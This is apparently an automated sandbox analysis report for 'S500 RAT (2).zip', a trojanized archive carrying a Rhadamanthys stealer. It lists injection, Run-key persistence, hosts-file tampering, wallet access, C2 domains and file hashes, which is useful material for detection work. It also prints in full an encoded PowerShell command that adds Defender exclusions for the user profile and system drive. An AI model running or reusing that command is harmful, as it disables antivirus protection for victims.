Analysis Overview
SHA256
eb5e0956e26576d0c02cd7749476a564bd8671375ccca863efaa7347235fdb7d
Threat Level: Known bad
The file S500 RAT (2).zip was found to be: Known bad.
Malicious Activity Summary
Detect rhadamanthys stealer shellcode
Rhadamanthys
Drops file in Drivers directory
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-15 17:44
Signatures
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 18:15
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1574s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 18:15
Platform
win10-20240221-en
Max time kernel
315s
Max time network
1596s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.179.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 17:50
Platform
win10v2004-20240226-en
Max time kernel
283s
Max time network
292s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\relog.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\blackCC.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\S500RAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\S500RAT.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
| N/A | N/A | C:\Windows\system32\relog.exe | N/A |
| N/A | N/A | C:\Windows\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\blackCC.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ta9x4fa0 = "C:\\Users\\Admin\\AppData\\Local\\Systemservices\\winserv.exe" | C:\Users\Admin\w00ieq6n.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ta9x4fa0 | C:\Windows\system32\relog.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1256 set thread context of 3840 | N/A | C:\Users\Admin\w00ieq6n.exe | C:\Windows\system32\relog.exe |
| PID 3840 set thread context of 4088 | N/A | C:\Windows\system32\relog.exe | C:\Windows\system32\relog.exe |
| PID 3160 set thread context of 3168 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\S500RAT.exe | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3160 -ip 3160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 140
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.177.78.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | zbot.casperstealer.xyz | udp |
| US | 8.8.8.8:53 | zbot.casperstealer.xyz | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
| MD5 | 9d934a508866d2b65b951b2324883bcb |
| SHA1 | be6d4e8dfd128bf5af66bc1a5a13cb055535d21f |
| SHA256 | 6570421db6fb394262b8eba6532bd4b7deb1cecb02d0ba85bc5829e412de493e |
| SHA512 | 55eca2b048b1655d23392be57491711784a32e56885b1e2611be51c040e85523b6e9c21da7da23a65ecd66b8645d7fad9b0ada3a0ae8e5f94e4381d8f64d0e92 |
C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
| MD5 | 7563692a3c64430d1a24cae8cbac0f9a |
| SHA1 | b53dc51fcb128678191254f1e6dfd3cda783bd09 |
| SHA256 | fd332a27e1a3a081a02901dc23c37140b9a6e93ef34a49495bc2803d104367bb |
| SHA512 | 3d4ac2905c0c86e2e123ac4b6c1d4f4ecf7d6746d824a9aa46eb7a40c7dcedfcb427b903bc7985c72db0f466d17eaac1848acf35bb689aa922aaa507481b5ea3 |
C:\Users\Admin\w00ieq6n.exe
| MD5 | 93eb0cf0043f1f507a1b94eea7b65fe4 |
| SHA1 | 148be925922c60190bde523cb60a50da9e544da1 |
| SHA256 | 6cbd8961b21b75bb176439538633191ed8364e755c8b2d049ca7281871430d30 |
| SHA512 | 94640f8dfd1ceeb8ec72be3bd40bbafb8b4b8dda584dffcd88c6c616cd65ffb9b0087ed093231db3940211a3b5c3fc8efed957c4e8a701b0a61dfe1c943ccf58 |
C:\Windows\S500RAT.exe
| MD5 | f6034f0ecc5b0c9215fa297f0a6d8086 |
| SHA1 | cb441b8d0a2b4c4552059d5cf54a88fd6385f0c3 |
| SHA256 | f52de95c3d07431531c85a3bff804dbbcd27e66b8518a6772418da8de83b3cc0 |
| SHA512 | 8d0058ec65ef63bc7e79de61cf67e9d997d08df90ce045c35c7373ced3ac43d444d7b84e212fa6aebdc48a7cd6b72f6e670542a6fcc1c7f0402601b10edad5bc |
C:\Windows\S500RAT.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\S500RAT.exe
| MD5 | 1a748d332b043dcdfc01ef5a33814f9e |
| SHA1 | 1cc45394f502bcfbb08e8954f74da65bebd7d795 |
| SHA256 | 7258fa5dd4508257975ea74d00597d9ea40e6116a6d6ae4d6d3b45575f2ba6b5 |
| SHA512 | 7f7bd025c1317cc8dbf6543ad9b12d24555c2785a579364405e980468baa94ac6d67bd697b3aba93cd428c2c260f60dd70d0a361d9e5fd70d2fb7e64fc845d72 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqvl02qy.p11.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | 7c655abff6a2cb60d63842e05a51d6b2 |
| SHA1 | d70e03f8f670863b5c1434bbb3863ed32b9a6e2c |
| SHA256 | 617ecffcf86b6515feb92c6a52148f6639e1ccbc1451ed70ac686b06da6944f7 |
| SHA512 | 64da15689720ef98f46575c95b0ce771c1f8a65d1ced6a38d1e57e555226a4b7c502ac4d8b0765127c0d505e35826df842cb6e52e84012b094c1f4cacaafa9e0 |
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | cfaed64341dadf8e868d447328c4bb6b |
| SHA1 | 915dc18ec60326d08810b314ec90b73fc1286ef5 |
| SHA256 | 7edeb06238d3ee9f9e1bace3798a354ef171c7f70b506209e9c2f686b4a595c3 |
| SHA512 | 0f45676599fcefa604175e92947227d1500f76d37d0513d3afe7d7c3c8fc292071d160b1f64a2494f8d309dbddb7dd2f6c543c78f8b0abd2ea7cdede887c95b4 |
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | e8c69baf6333db176565c35b24bf907e |
| SHA1 | 3a6c6f3920007edbacdce4d65fc7b66e51152fa5 |
| SHA256 | f3a50f78359ea85a9b25926c59ece4cd96d0c1c9f9f2c3d1683b72fe651f0302 |
| SHA512 | ca984e8f3e7757fc476488acc353cf17a1964e00cd86a2a238f5e53867865802d0f11881db44e5954d8d3c891da1858f4ae235951ccc134d2115ea9687b3842f |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | dbf35eac1c87ed287c8f7cba33d133b5 |
| SHA1 | d1dbfba561f8112e5099507a18cd9465b4fcb577 |
| SHA256 | 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd |
| SHA512 | c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 32a797a0ffe1c38536a192bfd5f2f97c |
| SHA1 | dd47a267aa0bfbe9a99064c62bed66b0fa8b2eb2 |
| SHA256 | 762c683be61f3e2704159d1248a0b1f66442211e00b862c437aaf02d58ada6cd |
| SHA512 | 49890d10eb60ca0391945ac647214521071cb112758fb0594dd96dca25f18080e42f51e048b90bb317b4187feccafef93b811b31070b5cc208c185e40e694b02 |
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
| MD5 | 462b459a2560b65a657cfecce53d682a |
| SHA1 | f0ce24faf42d2d1453c4f18fda0223b83486e5ae |
| SHA256 | 00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db |
| SHA512 | 5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4d58ec184b57efb5bc4f1adf1e7612f7 |
| SHA1 | 1952ebb9d3018da98581ee8d6a445f04ec3af7ec |
| SHA256 | 35a9aaf2902f956d01545ed2a108587cd9104ec03bad7e42351b3af999b67545 |
| SHA512 | a6302800e9d92adf5534e4e94fd4067cd5a137f3478327a15f14886e2849be58b11dae1e94a0e188464c1ce3f22d2fea18c68c603bdcfd70a7a7b915eabab06b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 17:50
Platform
win11-20240221-en
Max time kernel
271s
Max time network
251s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\relog.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
| N/A | N/A | C:\Windows\system32\relog.exe | N/A |
| N/A | N/A | C:\Windows\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\blackCC.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\u42umg86 = "C:\\Users\\Admin\\AppData\\Local\\Systemservices\\winserv.exe" | C:\Users\Admin\w00ieq6n.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\09tf8zz4 | C:\Windows\system32\relog.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1400 set thread context of 1276 | N/A | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1836 set thread context of 5088 | N/A | C:\Users\Admin\w00ieq6n.exe | C:\Windows\system32\relog.exe |
| PID 5088 set thread context of 3052 | N/A | C:\Windows\system32\relog.exe | C:\Windows\system32\relog.exe |
| PID 4480 set thread context of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\S500RAT.exe | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe
"C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1400 -ip 1400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 284
C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe
"C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
